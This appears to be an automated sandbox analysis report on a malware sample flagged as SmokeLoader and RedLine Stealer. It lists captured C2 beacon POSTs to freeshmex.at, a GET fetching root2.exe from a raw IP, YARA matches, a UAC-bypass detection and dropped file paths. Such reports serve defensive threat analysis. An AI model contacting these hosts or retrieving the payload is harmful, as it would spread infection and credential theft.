          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asqgcaowns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjowxl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltpqmt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlkbyd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvcqra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmtttoldxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hubudix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feciyrtt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwivfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqeagnejjt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://epgfrxxkra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jksmgkjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctvfqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sopric.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyiltqe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqevfdrdxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkqddhkgrs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vppnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlawl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lccctghley.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gkaof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wwdygs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idgtg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: freeshmex.at
          Source: unknownDNS traffic detected: queries for: freeshmex.at
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EE626 InternetReadFile,8_2_004EE626
          Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
          Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
          Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49716 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Yara detected SmokeLoader
          Source: Yara matchFile source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: file.exe, 00000001.00000002.378045124.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F306A CryptImportKey,_itoa,8_2_004F306A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005032A3 CryptImportKey,8_2_005032A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B6340 CryptImportKey,8_2_004B6340
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00495303 CryptImportKey,8_2_00495303
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BEACF CryptImportKey,8_2_004BEACF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048CC12 CryptAcquireContextA,GetProcAddress,CryptImportKey,8_2_0048CC12

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004096E81_2_004096E8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040C4841_2_0040C484
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040BF401_2_0040BF40
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040D5351_2_0040D535
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004096E85_2_004096E8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040C4845_2_0040C484
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040BF405_2_0040BF40
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040D5355_2_0040D535
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B60818_2_004B6081
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F210A8_2_004F210A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004831AB8_2_004831AB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E92BB8_2_004E92BB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005063008_2_00506300
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E68778_2_004E6877
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DCA2B8_2_004DCA2B
